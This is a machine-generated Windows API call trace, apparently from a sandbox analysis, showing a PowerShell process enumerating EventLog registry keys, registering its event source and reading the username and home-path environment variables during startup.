	[0559.090] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.090] CoTaskMemFree (pv=0x1e2120) 
	[0559.090] CoTaskMemFree (pv=0x0) 
	[0559.090] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.090] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.090] CoTaskMemFree (pv=0x1e2120) 
	[0559.090] CoTaskMemFree (pv=0x0) 
	[0559.090] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x310) returned 0x0
	[0559.090] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.090] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x344) returned 0x0
	[0559.091] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.091] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x348) returned 0x0
	[0559.091] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.091] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x34c) returned 0x0
	[0559.091] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.091] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x350) returned 0x0
	[0559.091] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.091] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x354) returned 0x0
	[0559.091] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.092] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x358) returned 0x0
	[0559.092] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.092] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x35c) returned 0x0
	[0559.092] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.092] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x360) returned 0x0
	[0559.092] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x364) returned 0x0
	[0559.092] RegCloseKey (hKey=0x364) returned 0x0
	[0559.092] RegCloseKey (hKey=0x30c) returned 0x0
	[0559.093] RegCloseKey (hKey=0x360) returned 0x0
	[0559.093] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4a8 | out: phkResult=0xad4a8*=0x360) returned 0x0
	[0559.093] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad41c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad418, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad41c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad418*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.094] CoTaskMemFree (pv=0x0) 
	[0559.094] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.094] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.094] CoTaskMemFree (pv=0x1e2120) 
	[0559.094] CoTaskMemFree (pv=0x0) 
	[0559.094] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.094] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.094] CoTaskMemFree (pv=0x1e2120) 
	[0559.094] CoTaskMemFree (pv=0x0) 
	[0559.094] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.094] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.094] CoTaskMemFree (pv=0x1e2120) 
	[0559.094] CoTaskMemFree (pv=0x0) 
	[0559.094] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.094] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.094] CoTaskMemFree (pv=0x1e2120) 
	[0559.094] CoTaskMemFree (pv=0x0) 
	[0559.094] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.094] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.094] CoTaskMemFree (pv=0x1e2120) 
	[0559.094] CoTaskMemFree (pv=0x0) 
	[0559.094] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.094] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.094] CoTaskMemFree (pv=0x1e2120) 
	[0559.094] CoTaskMemFree (pv=0x0) 
	[0559.095] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.095] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.095] CoTaskMemFree (pv=0x1e2120) 
	[0559.095] CoTaskMemFree (pv=0x0) 
	[0559.095] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.095] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.095] CoTaskMemFree (pv=0x1e2120) 
	[0559.095] CoTaskMemFree (pv=0x0) 
	[0559.095] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.095] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x1e2120, lpcchName=0xad4a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xad4a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.095] CoTaskMemFree (pv=0x1e2120) 
	[0559.095] CoTaskMemFree (pv=0x0) 
	[0559.095] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x30c) returned 0x0
	[0559.095] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.095] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x364) returned 0x0
	[0559.095] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.095] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x368) returned 0x0
	[0559.095] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.096] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x36c) returned 0x0
	[0559.096] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.096] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x370) returned 0x0
	[0559.096] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.096] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x374) returned 0x0
	[0559.096] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.096] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x378) returned 0x0
	[0559.096] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.096] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x37c) returned 0x0
	[0559.096] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x0) returned 0x2
	[0559.096] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x380) returned 0x0
	[0559.097] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad508 | out: phkResult=0xad508*=0x384) returned 0x0
	[0559.097] RegCloseKey (hKey=0x384) returned 0x0
	[0559.097] RegCloseKey (hKey=0x360) returned 0x0
	[0559.097] RegCloseKey (hKey=0x380) returned 0x0
	[0559.099] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xad478 | out: phkResult=0xad478*=0x380) returned 0x0
	[0559.099] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad3ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad3e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad3ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad3e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.099] CoTaskMemFree (pv=0x0) 
	[0559.099] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.099] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x1e2120, lpcchName=0xad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.099] CoTaskMemFree (pv=0x1e2120) 
	[0559.099] CoTaskMemFree (pv=0x0) 
	[0559.099] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.099] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x1e2120, lpcchName=0xad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.099] CoTaskMemFree (pv=0x1e2120) 
	[0559.099] CoTaskMemFree (pv=0x0) 
	[0559.099] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.099] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x1e2120, lpcchName=0xad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.099] CoTaskMemFree (pv=0x1e2120) 
	[0559.099] CoTaskMemFree (pv=0x0) 
	[0559.099] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.099] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x1e2120, lpcchName=0xad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.099] CoTaskMemFree (pv=0x1e2120) 
	[0559.099] CoTaskMemFree (pv=0x0) 
	[0559.100] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.100] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x1e2120, lpcchName=0xad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.100] CoTaskMemFree (pv=0x1e2120) 
	[0559.100] CoTaskMemFree (pv=0x0) 
	[0559.100] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.100] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x1e2120, lpcchName=0xad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.100] CoTaskMemFree (pv=0x1e2120) 
	[0559.100] CoTaskMemFree (pv=0x0) 
	[0559.100] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.100] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x1e2120, lpcchName=0xad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.100] CoTaskMemFree (pv=0x1e2120) 
	[0559.100] CoTaskMemFree (pv=0x0) 
	[0559.100] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.100] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x1e2120, lpcchName=0xad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.100] CoTaskMemFree (pv=0x1e2120) 
	[0559.100] CoTaskMemFree (pv=0x0) 
	[0559.100] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0559.100] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x1e2120, lpcchName=0xad478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xad478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.100] CoTaskMemFree (pv=0x1e2120) 
	[0559.100] CoTaskMemFree (pv=0x0) 
	[0559.100] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x360) returned 0x0
	[0559.101] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x0) returned 0x2
	[0559.101] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x384) returned 0x0
	[0559.101] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x0) returned 0x2
	[0559.101] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x388) returned 0x0
	[0559.101] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x0) returned 0x2
	[0559.101] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x38c) returned 0x0
	[0559.101] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x0) returned 0x2
	[0559.101] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x390) returned 0x0
	[0559.101] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x0) returned 0x2
	[0559.101] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x394) returned 0x0
	[0559.101] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x0) returned 0x2
	[0559.102] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x398) returned 0x0
	[0559.102] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x0) returned 0x2
	[0559.102] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x39c) returned 0x0
	[0559.102] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x0) returned 0x2
	[0559.102] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x3a0) returned 0x0
	[0559.102] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad4d8 | out: phkResult=0xad4d8*=0x3a4) returned 0x0
	[0559.102] RegCloseKey (hKey=0x3a4) returned 0x0
	[0559.102] RegCloseKey (hKey=0x380) returned 0x0
	[0559.103] RegCloseKey (hKey=0x3a0) returned 0x0
	[0559.107] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b7c0008
	[0560.625] ReportEventW (hEventLog=0x1b7c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f0dc40*="WSMan", lpRawData=0x2f0d9b0) returned 1
	[0560.632] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0560.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.632] CoTaskMemFree (pv=0x19ae70) 
	[0560.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.634] CoTaskMemAlloc (cb=0x804) returned 0x2553f0
	[0560.634] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2553f0, nSize=0xad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad768) returned 0x1
	[0560.635] CoTaskMemFree (pv=0x2553f0) 
	[0560.635] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0560.635] GetUserNameW (in: lpBuffer=0x1e2120, pcbBuffer=0xad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad7a8) returned 1
	[0560.635] CoTaskMemFree (pv=0x1e2120) 
	[0560.635] ReportEventW (hEventLog=0x1b7c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f13178*="Alias", lpRawData=0x2f12f08) returned 1
	[0560.642] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0560.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.642] CoTaskMemFree (pv=0x19ae70) 
	[0560.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xacf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.644] CoTaskMemAlloc (cb=0x804) returned 0x2553f0
	[0560.644] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2553f0, nSize=0xad768 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad768) returned 0x1
	[0560.644] CoTaskMemFree (pv=0x2553f0) 
	[0560.644] CoTaskMemAlloc (cb=0x204) returned 0x1e2120
	[0560.644] GetUserNameW (in: lpBuffer=0x1e2120, pcbBuffer=0xad7a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad7a8) returned 1
	[0560.645] CoTaskMemFree (pv=0x1e2120) 
	[0560.645] ReportEventW (hEventLog=0x1b7c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f18770*="Environment", lpRawData=0x2f18500) returned 1
	[0560.660] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0560.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.660] CoTaskMemFree (pv=0x19ae70) 
	[0560.661] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0560.661] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0560.661] CoTaskMemFree (pv=0x19ae70) 
	[0560.661] CoTaskMemAlloc (cb=0x104) returned 0x19ae70
	[0560.661] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x19ae70, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0560.661] CoTaskMemFree (pv=0x19ae70) 
